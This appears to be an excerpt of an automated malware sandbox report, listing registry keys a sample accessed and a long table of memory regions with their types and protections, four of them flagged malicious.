HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\32BA2
32BA2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\32BA2
32BA2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 382 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
91E0000
trusted library section
page read and write
 malicious
4266000
trusted library allocation
page read and write
 malicious
791000
heap
page read and write
 malicious
400000
remote allocation
page execute and read and write
 malicious
456F000
stack
page read and write
7D9000
heap
page read and write
34D0000
trusted library allocation
page read and write
30EC000
stack
page read and write
4D35000
heap
page read and write
4C50000
trusted library allocation
page read and write
71E1000
trusted library allocation
page read and write
2C58000
heap
page read and write
4C50000
trusted library allocation
page read and write
2D0000
trusted library allocation
page read and write
238F000
stack
page read and write
BBE1000
trusted library allocation
page read and write
4BE0000
trusted library allocation
page read and write
1DB0000
direct allocation
page read and write
34D0000
trusted library allocation
page read and write
3562000
heap
page read and write
DDD000
stack
page read and write
3540000
heap
page read and write
34D0000
trusted library allocation
page read and write
41EF000
heap
page read and write
CDF000
stack
page read and write
3D4000
heap
page read and write
3E20000
heap
page read and write
35B9000
heap
page read and write
E3F000
stack
page read and write
3B0000
heap
page read and write
35B6000
heap
page read and write
37F000
heap
page read and write
10000
heap
page read and write
EC000
heap
page read and write
6C1000
heap
page read and write
90E000
stack
page read and write
2A5D000
heap
page read and write
34D0000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
619E000
stack
page read and write
471E000
stack
page read and write
2A9F000
heap
page read and write
4C50000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
4BE0000
trusted library allocation
page read and write
3964000
heap
page read and write
EC000
heap
page read and write
4ED7000
heap
page read and write
215000
trusted library allocation
page execute and read and write
4E10000
heap
page read and write
41F4000
heap
page read and write
DA0000
heap
page read and write
436000
heap
page read and write
2A9F000
heap
page read and write
4496000
heap
page execute and read and write
34D0000
trusted library allocation
page read and write
20000
heap
page read and write
24B0000
heap
page execute and read and write
34D0000
trusted library allocation
page read and write
3BF000
stack
page read and write
34D0000
trusted library allocation
page read and write
2A67000
heap
page read and write
4AFE000
stack
page read and write
35B6000
heap
page read and write
53A000
heap
page read and write
28AF000
stack
page read and write
1A6000
stack
page read and write
6EA000
heap
page read and write
3540000
heap
page read and write
2510000
trusted library allocation
page read and write
285F000
stack
page read and write
2C68000
heap
page read and write
358B000
heap
page read and write
5E3D000
stack
page read and write
2E50000
heap
page read and write
4D4D000
heap
page read and write
4B0000
heap
page read and write
49D000
heap
page read and write
4EE8000
heap
page read and write
2A6C000
heap
page read and write
2679000
trusted library allocation
page read and write
5DF000
heap
page read and write
35CF000
heap
page read and write
5C50000
heap
page read and write
18A000
stack
page read and write
5CCE000
stack
page read and write
4330000
trusted library allocation
page read and write
655000
heap
page read and write
A50000
heap
page read and write
2ED000
heap
page read and write
35C0000
heap
page read and write
10000
heap
page read and write
368000
heap
page read and write
439000
trusted library allocation
page read and write
C2F4000
trusted library allocation
page read and write
493E000
stack
page read and write
65A000
heap
page read and write
2A6C000
heap
page read and write
10000
heap
page read and write
28B000
stack
page read and write
48F000
heap
page read and write
4BAF000
stack
page read and write
DA000
heap
page read and write
35E000
stack
page read and write
4350000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
35E000
stack
page read and write
48D000
heap
page read and write
5D5E000
stack
page read and write
960000
trusted library allocation
page read and write
5DEF000
stack
page read and write
3DBF000
stack
page read and write
580000
heap
page read and write
930000
heap
page read and write
C2F8000
trusted library allocation
page read and write
4C50000
trusted library allocation
page read and write
1AA000
trusted library allocation
page read and write
424F000
stack
page read and write
3D12000
trusted library allocation
page read and write
CFE000
stack
page read and write
2C10000
heap
page read and write
1D90000
heap
page read and write
2A83000
heap
page read and write
628000
heap
page read and write
1D22000
heap
page read and write
D40000
heap
page read and write
1FE0000
direct allocation
page read and write
4BBF000
stack
page read and write
DF0000
trusted library allocation
page read and write
41C000
heap
page read and write
4C50000
trusted library allocation
page read and write
3C0000
heap
page read and write
E10000
trusted library allocation
page read and write
1DCB000
heap
page read and write
3FF000
heap
page read and write
190000
trusted library allocation
page read and write
537000
heap
page read and write
4BDE000
unkown
page read and write
2E2C000
stack
page read and write
980000
heap
page read and write
4CB4000
heap
page read and write
35C5000
heap
page read and write
35CD000
heap
page read and write
270000
trusted library allocation
page execute and read and write
2C0C000
stack
page read and write
34D0000
trusted library allocation
page read and write
2BED000
stack
page read and write
4D1000
heap
page read and write
250000
heap
page read and write
41CD000
heap
page read and write
2A6B000
heap
page read and write
500000
heap
page read and write
400000
heap
page read and write
4A0000
heap
page read and write
3560000
heap
page read and write
48F000
heap
page read and write
194000
trusted library allocation
page read and write
34F7000
heap
page read and write
3420000
heap
page read and write
3FE000
stack
page read and write
617000
heap
page read and write
34C0000
heap
page read and write
273F000
stack
page read and write
5A6000
heap
page read and write
1A9000
stack
page read and write
636000
heap
page read and write
36B0000
trusted library allocation
page read and write
4B9E000
stack
page read and write
34D0000
trusted library allocation
page read and write
4D34000
heap
page read and write
27B8000
trusted library allocation
page read and write
6BE1000
trusted library allocation
page read and write
5D0E000
stack
page read and write
2FC000
stack
page read and write
263F000
stack
page read and write
257000
heap
page read and write
23EC000
stack
page read and write
4D00000
heap
page read and write
354000
heap
page read and write
212000
trusted library allocation
page read and write
61DE000
stack
page read and write
3331000
trusted library allocation
page read and write
2E9E000
stack
page read and write
26C000
stack
page read and write
C2CC000
trusted library allocation
page read and write
9C0000
trusted library allocation
page read and write
2A73000
heap
page read and write
34D0000
trusted library allocation
page read and write
3B40000
heap
page read and write
3D15000
trusted library allocation
page read and write
35CF000
heap
page read and write
690000
trusted library allocation
page read and write
463000
heap
page read and write
23B5000
trusted library allocation
page read and write
48D000
heap
page read and write
DE0000
trusted library allocation
page read and write
4840000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
26EC000
trusted library allocation
page read and write
4C50000
trusted library allocation
page read and write
2A83000
heap
page read and write
446F000
stack
page read and write
A20000
trusted library allocation
page read and write
3AC000
stack
page read and write
4EFF000
heap
page read and write
1F34000
heap
page read and write
412E000
stack
page read and write
1C0000
trusted library allocation
page read and write
4C50000
trusted library allocation
page read and write
613000
heap
page read and write
2EDE000
stack
page read and write
2FDF000
stack
page read and write
4D04000
heap
page read and write
48AD000
stack
page read and write
2E0000
heap
page read and write
3560000
heap
page read and write
19D000
trusted library allocation
page execute and read and write
3540000
heap
page read and write
4D3000
heap
page read and write
430000
trusted library allocation
page read and write
2C5B000
heap
page read and write
2A83000
heap
page read and write
E00000
trusted library allocation
page read and write
1C2000
trusted library allocation
page read and write
3950000
heap
page read and write
808000
heap
page read and write
2A5F000
heap
page read and write
454000
heap
page read and write
53F000
heap
page read and write
4CE000
heap
page read and write
2A9C000
heap
page read and write
27BA000
trusted library allocation
page read and write
2A6A000
heap
page read and write
48CD000
stack
page read and write
DDA000
trusted library allocation
page read and write
530E000
stack
page read and write
570000
trusted library allocation
page read and write
5C12000
heap
page read and write
35C7000
heap
page read and write
25A3000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
4EDF000
heap
page read and write
524000
heap
page read and write
3E25000
heap
page read and write
34D0000
trusted library allocation
page read and write
19D000
trusted library allocation
page execute and read and write
25A8000
trusted library allocation
page read and write
4A0D000
stack
page read and write
264A000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
1BA000
trusted library allocation
page read and write
43AF000
stack
page read and write
4BB0000
heap
page read and write
4E82000
heap
page read and write
4C50000
heap
page read and write
4EF9000
heap
page read and write
B0000
heap
page read and write
7E1000
heap
page read and write
300000
heap
page read and write
34D0000
trusted library allocation
page read and write
454000
heap
page read and write
2330000
trusted library allocation
page read and write
27CB000
trusted library allocation
page read and write
4BE000
heap
page read and write
5B0000
heap
page read and write
D6D000
stack
page read and write
2C64000
heap
page read and write
23AC000
stack
page read and write
43EE000
stack
page read and write
4E1F000
heap
page read and write
49D000
heap
page read and write
3DE000
stack
page read and write
340000
trusted library allocation
page read and write
2BE000
stack
page read and write
C352000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
4CFE000
stack
page read and write
5FF000
stack
page read and write
270000
heap
page read and write
61F000
heap
page read and write
3961000
heap
page read and write
2A6C000
heap
page read and write
40E000
heap
page read and write
280C000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
283F000
stack
page read and write
5BE000
stack
page read and write
44F000
heap
page read and write
2CE000
stack
page read and write
2A83000
heap
page read and write
5D4000
heap
page read and write
10000
heap
page read and write
775000
heap
page read and write
35CF000
heap
page read and write
35C0000
heap
page read and write
710000
heap
page read and write
2E7000
heap
page read and write
3AE000
stack
page read and write
C2FA000
trusted library allocation
page read and write
1F30000
heap
page read and write
24DF000
stack
page read and write
1FAE000
stack
page read and write
4E5D000
heap
page read and write
2A7C000
heap
page read and write
5BDE000
stack
page read and write
669000
heap
page read and write
248F000
stack
page read and write
4BB1000
heap
page read and write
2A67000
heap
page read and write
35BA000
heap
page read and write
3560000
heap
page read and write
35C000
heap
page read and write
2382000
trusted library allocation
page read and write
3964000
heap
page read and write
490000
heap
page read and write
2A9F000
heap
page read and write
DC1000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
287000
heap
page read and write
385C000
heap
page read and write
34D0000
trusted library allocation
page read and write
2E1E000
stack
page read and write
438000
heap
page read and write
3CD7000
heap
page read and write
260B000
trusted library allocation
page read and write
4BA0000
heap
page read and write
C2B9000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
8B000
stack
page read and write
25CB000
trusted library allocation
page read and write
460000
heap
page read and write
3A0000
remote allocation
page read and write
3359000
trusted library allocation
page read and write
265E000
stack
page read and write
4E0D000
stack
page read and write
DD5000
trusted library allocation
page read and write
1F3F000
stack
page read and write
49D000
heap
page read and write
34D0000
trusted library allocation
page read and write
4850000
trusted library allocation
page execute and read and write
4BDD000
heap
page read and write
49D000
heap
page read and write
34F0000
heap
page read and write
26F5000
trusted library allocation
page read and write
4ADD000
stack
page read and write
436000
heap
page read and write
34D0000
trusted library allocation
page read and write
203F000
stack
page read and write
3589000
trusted library allocation
page read and write
3D10000
trusted library allocation
page read and write
35CF000
heap
page read and write
3339000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
180000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
53D2000
heap
page read and write
6BF000
heap
page read and write
7BE1000
trusted library allocation
page read and write
49D000
heap
page read and write
1E0000
heap
page read and write
533000
heap
page read and write
36F000
heap
page read and write
382E000
stack
page read and write
2AA2000
heap
page read and write
3F0000
heap
page read and write
61E1000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
2C6B000
heap
page read and write
717000
heap
page read and write
474000
remote allocation
page execute and read and write
4340000
trusted library allocation
page read and write
486F000
stack
page read and write
34D0000
trusted library allocation
page read and write
35B6000
heap
page read and write
34D0000
trusted library allocation
page read and write
265B000
trusted library allocation
page read and write
43E0000
trusted library allocation
page execute and read and write
35B8000
heap
page read and write
73E000
stack
page read and write
5DAE000
stack
page read and write
8BE1000
trusted library allocation
page read and write
32DD000
stack
page read and write
4A1F000
stack
page read and write
BB0000
heap
page read and write
A1F000
stack
page read and write
31CB000
trusted library allocation
page read and write
2C00000
heap
page read and write
E9000
heap
page read and write
4FC0000
heap
page read and write
34D0000
trusted library allocation
page read and write
4CC3000
heap
page read and write
8DB000
stack
page read and write
34D0000
trusted library allocation
page read and write
36C9000
trusted library allocation
page read and write
70DE000
trusted library allocation
page read and write
9890000
heap
page read and write
2A83000
heap
page read and write
EC000
stack
page read and write
4BA000
heap
page read and write
357000
heap
page read and write
CE0000
trusted library allocation
page read and write
10000
heap
page read and write
360000
heap
page read and write
34D0000
trusted library allocation
page read and write
B8000
heap
page read and write
3840000
heap
page read and write
3A0000
remote allocation
page read and write
2E9000
heap
page read and write
4D45000
heap
page read and write
34D0000
trusted library allocation
page read and write
34F1000
heap
page read and write
C361000
trusted library allocation
page read and write
34F7000
heap
page read and write
494000
heap
page read and write
4D22000
heap
page read and write
34D0000
trusted library allocation
page read and write
3776000
heap
page read and write
49D000
heap
page read and write
476D000
stack
page read and write
48F0000
trusted library allocation
page read and write
2A5E000
heap
page read and write
2E0000
trusted library allocation
page read and write
2C60000
heap
page read and write
2828000
trusted library allocation
page read and write
24F0000
trusted library allocation
page read and write
5B0000
heap
page read and write
750000
heap
page read and write
33C0000
heap
page read and write
4A8E000
stack
page read and write | page guard
4490000
heap
page execute and read and write
1EDF000
stack
page read and write
4A4E000
stack
page read and write
2A73000
heap
page read and write
5C61000
heap
page read and write
193000
trusted library allocation
page execute and read and write
DE0000
trusted library allocation
page read and write
1F1C000
stack
page read and write
1A0000
trusted library allocation
page read and write
DAD000
stack
page read and write
25EB000
trusted library allocation
page read and write
3B50000
heap
page read and write
4C50000
trusted library allocation
page read and write
48B000
heap
page read and write
437000
heap
page read and write
34D0000
trusted library allocation
page read and write
2331000
trusted library allocation
page read and write
4910000
heap
page read and write
1BA000
trusted library allocation
page execute and read and write
A40000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
656000
heap
page read and write
615E000
stack
page read and write
90000
heap
page read and write
734000
heap
page read and write
3574000
heap
page read and write
2340000
trusted library allocation
page read and write
4F80000
heap
page read and write
217000
trusted library allocation
page execute and read and write
6E5000
heap
page read and write
D4D000
stack
page read and write
35C5000
heap
page read and write
34D0000
trusted library allocation
page read and write
442F000
stack
page read and write
34D0000
trusted library allocation
page read and write
4C87000
heap
page read and write
454000
heap
page read and write
494E000
stack
page read and write
4400000
trusted library allocation
page read and write
1D34000
heap
page read and write
260000
trusted library allocation
page execute and read and write
2366000
trusted library allocation
page read and write
357A000
heap
page read and write
34D0000
trusted library allocation
page read and write
262F000
stack
page read and write
27F000
stack
page read and write
2A6C000
heap
page read and write
2FE0000
heap
page read and write
80F1000
trusted library allocation
page read and write
490E000
stack
page read and write
C9D000
stack
page read and write
34D0000
trusted library allocation
page read and write
4C50000
trusted library allocation
page read and write
34D0000
heap
page read and write
357C000
heap
page read and write
26CB000
trusted library allocation
page read and write
CDE000
stack
page read and write | page guard
180000
trusted library allocation
page read and write
3CD7000
heap
page read and write
C4E000
stack
page read and write
35CF000
heap
page read and write
40C9000
trusted library allocation
page read and write
2A40000
heap
page read and write
40E000
heap
page read and write
34D0000
trusted library allocation
page read and write
343000
trusted library allocation
page read and write
5BF0000
heap
page read and write
F3E000
stack
page read and write
23B0000
heap
page read and write
4D50000
heap
page read and write
3561000
trusted library allocation
page read and write
48D000
heap
page read and write
9B0000
trusted library allocation
page execute and read and write
35CD000
heap
page read and write
4170000
heap
page read and write
31A0000
heap
page read and write
35BA000
heap
page read and write
4C50000
trusted library allocation
page read and write
210000
trusted library allocation
page read and write
2AF000
heap
page read and write
34D0000
trusted library allocation
page read and write
3573000
heap
page read and write
4D4A000
heap
page read and write
34D0000
trusted library allocation
page read and write
9D0000
trusted library allocation
page read and write
244B000
heap
page read and write
3560000
heap
page read and write
2D2000
trusted library allocation
page read and write
1DA0000
heap
page read and write
2D2F000
stack
page read and write
15C000
stack
page read and write
436000
heap
page read and write
497E000
stack
page read and write
CE000
heap
page read and write
1C5000
trusted library allocation
page execute and read and write
34F3000
heap
page read and write
5E80000
heap
page read and write
27B4000
trusted library allocation
page read and write
4FCC000
heap
page read and write
D761000
trusted library allocation
page read and write
1D00000
heap
page read and write
268B000
trusted library allocation
page read and write
610000
heap
page read and write
3F0000
heap
page execute and read and write
48F000
heap
page read and write
49D000
heap
page read and write
840000
heap
page read and write
4EFE000
stack
page read and write
490000
heap
page read and write
3B51000
heap
page read and write
4BB6000
heap
page read and write
34D0000
trusted library allocation
page read and write
2F9D000
stack
page read and write
394F000
stack
page read and write
1CCD000
stack
page read and write
48F000
heap
page read and write
618000
heap
page read and write
2FA0000
heap
page read and write
7EE000
heap
page read and write
34D0000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
4FD000
heap
page read and write
10000
heap
page read and write
34D0000
trusted library allocation
page read and write
C2FC000
trusted library allocation
page read and write
91E000
stack
page read and write
34D0000
trusted library allocation
page read and write
1A0000
heap
page read and write
48E0000
trusted library allocation
page read and write
3562000
heap
page read and write
347000
trusted library allocation
page read and write
2C54000
heap
page read and write
26C8000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
2A4000
heap
page read and write
260000
direct allocation
page read and write
436000
heap
page read and write
17D000
heap
page read and write
34D0000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
3CD0000
heap
page read and write
3562000
heap
page read and write
34D0000
trusted library allocation
page read and write
E70000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
20000
heap
page read and write
454000
heap
page read and write
3969000
heap
page read and write
2AB8000
heap
page read and write
2C50000
heap
page read and write
2A9F000
heap
page read and write
941000
heap
page read and write
4A8E000
stack
page read and write
352D000
stack
page read and write
35C7000
heap
page read and write
34D0000
trusted library allocation
page read and write
194000
trusted library allocation
page read and write
3540000
heap
page read and write
3FF000
heap
page read and write
49BE000
stack
page read and write
35B6000
heap
page read and write
1F52000
heap
page read and write
E60000
trusted library allocation
page read and write
3E6000
heap
page read and write
2F0000
heap
page read and write
43CF000
stack
page read and write
A1E000
stack
page read and write | page guard
9A2000
heap
page read and write
35B6000
heap
page read and write
10000
heap
page read and write
4E4E000
stack
page read and write
D6000
heap
page read and write
7CA000
heap
page read and write
160000
heap
page read and write
2A6C000
heap
page read and write
371D000
stack
page read and write
D00000
trusted library allocation
page read and write
3D13000
trusted library allocation
page read and write
23B1000
heap
page read and write
48BD000
stack
page read and write
CD61000
trusted library allocation
page read and write
48D0000
trusted library allocation
page execute and read and write
3130000
heap
page read and write
193000
trusted library allocation
page execute and read and write
262F000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
3951000
heap
page read and write
262B000
trusted library allocation
page read and write
37C000
heap
page read and write
BC1000
heap
page read and write
53B0000
heap
page read and write
1B0000
trusted library allocation
page read and write
280000
heap
page read and write
DF000
heap
page read and write
34D0000
trusted library allocation
page read and write
757000
heap
page read and write
20000
heap
page read and write
4BB1000
heap
page read and write
4C50000
trusted library allocation
page read and write
4C50000
trusted library allocation
page read and write
456F000
stack
page read and write
36F000
heap
page read and write
254E000
stack
page read and write
2A9A000
heap
page read and write
5A0000
heap
page read and write
D50000
trusted library allocation
page read and write
4CB3000
heap
page read and write
34D0000
trusted library allocation
page read and write
49DE000
stack
page read and write
374000
heap
page read and write
3BE000
stack
page read and write | page guard
34D0000
trusted library allocation
page read and write
6A0000
heap
page read and write
2A83000
heap
page read and write
535F000
stack
page read and write
2728000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
53B4000
heap
page read and write
36D000
stack
page read and write
A30000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
18C000
stack
page read and write
34D0000
trusted library allocation
page read and write
2A83000
heap
page read and write
4CFE000
stack
page read and write
34F7000
heap
page read and write
4D34000
heap
page read and write
34E5000
heap
page read and write
3573000
heap
page read and write
2390000
trusted library allocation
page read and write
4A5000
heap
page read and write
300000
heap
page read and write
600000
trusted library allocation
page execute and read and write
24B6000
heap
page execute and read and write
34D0000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
306E000
stack
page read and write
4EBF000
heap
page read and write
1D95000
heap
page read and write
30AC000
stack
page read and write
48D000
heap
page read and write
C2D0000
trusted library allocation
page read and write
2DBE000
stack
page read and write
2C50000
heap
page read and write
4C50000
trusted library allocation
page read and write
2A5F000
heap
page read and write
4BC0000
heap
page read and write
4E41000
heap
page read and write
A58000
heap
page read and write
4A8C000
stack
page read and write
27C3000
trusted library allocation
page read and write
34D0000
trusted library allocation
page read and write
39D000
stack
page read and write
250E000
stack
page read and write
89000
stack
page read and write
41B0000
heap
page read and write
336000
heap
page read and write
97000
heap
page read and write
1F7000
stack
page read and write
466E000
stack
page read and write
34D0000
trusted library allocation
page read and write
2710000
heap
page read and write
3340000
heap
page read and write
4B1C000
stack
page read and write
88000
stack
page read and write
55A000
heap
page read and write
662000
heap
page read and write
4BB4000
heap
page read and write
4FB0000
heap
page read and write
35B8000
heap
page read and write
984000
heap
page read and write
27C7000
trusted library allocation
page read and write
DF0000
trusted library allocation
page read and write
2561000
trusted library allocation
page read and write
4A9000
heap
page read and write
33BC000
stack
page read and write
95E000
stack
page read and write
2C2F000
stack
page read and write
7FC000
heap
page read and write
1D04000
heap
page read and write
5BF4000
heap
page read and write
4402000
trusted library allocation
page read and write
2AB3000
heap
page read and write
2A61000
heap
page read and write
4C34000
heap
page read and write
2500000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
F7E000
stack
page read and write
36A000
heap
page read and write
2C4000
heap
page read and write
CF0000
trusted library allocation
page read and write
4EF7000
heap
page read and write
5FDE000
stack
page read and write
4AA000
heap
page read and write
46D000
heap
page read and write
43AE000
stack
page read and write
4C50000
trusted library allocation
page read and write
4B5B000
stack
page read and write
B0E000
stack
page read and write
3D11000
trusted library allocation
page read and write
560000
heap
page read and write
35CF000
heap
page read and write
416C000
stack
page read and write
81E1000
trusted library allocation
page read and write
DCE000
trusted library allocation
page read and write
2520000
heap
page execute and read and write
78C000
heap
page read and write
4A9000
heap
page read and write
34D0000
trusted library allocation
page read and write
5B5E000
stack
page read and write
2A6F000
heap
page read and write
5FE0000
heap
page read and write
4C11000
heap
page read and write
6AB000
heap
page read and write
B1E1000
trusted library allocation
page read and write
4AE000
heap
page read and write
190000
trusted library allocation
page read and write
23BD000
trusted library allocation
page read and write
666000
heap
page read and write
478000
remote allocation
page execute and read and write
1B7000
trusted library allocation
page execute and read and write
2A62000
heap
page read and write
4AD000
heap
page read and write
39A0000
heap
page read and write
1FD0000
heap
page read and write
68F000
heap
page read and write
4430000
heap
page read and write
34D0000
trusted library allocation
page read and write
3573000
heap
page read and write
4A1E000
stack
page read and write
269A000
trusted library allocation
page read and write
4D4D000
heap
page read and write
4DCE000
stack
page read and write
4C50000
trusted library allocation
page read and write
4A6000
heap
page read and write
4B4E000
stack
page read and write
34D0000
trusted library allocation
page read and write
2A64000
heap
page read and write
2C0000
trusted library allocation
page read and write
3562000
heap
page read and write
3740000
heap
page read and write
3E29000
heap
page read and write
39E0000
heap
page read and write
37F000
heap
page read and write
2BBE000
stack
page read and write
3B7000
heap
page read and write
35B7000
heap
page read and write
550000
heap
page read and write
12C000
stack
page read and write
41DF000
heap
page read and write
34D0000
trusted library allocation
page read and write
ACE000
stack
page read and write
4A8F000
stack
page read and write
3D14000
trusted library allocation
page read and write
4C35000
heap
page read and write
3E7000
heap
page read and write
9AE000
stack
page read and write
EC000
heap
page read and write
10000
heap
page read and write
2A6A000
heap
page read and write
349000
trusted library allocation
page read and write
23A0000
trusted library allocation
page read and write
2380000
trusted library allocation
page read and write
4BE0000
trusted library allocation
page read and write
1D30000
heap
page read and write
5B7000
heap
page read and write
53E000
stack
page read and write
97000
stack
page read and write
4FF000
stack
page read and write
312C000
stack
page read and write
847000
heap
page read and write
7C4000
heap
page read and write
40EE000
stack
page read and write
29AF000
stack
page read and write
34D0000
trusted library allocation
page read and write
EB0000
trusted library allocation
page read and write
EBE000
stack
page read and write
There are 796 hidden memdumps, click here to show them.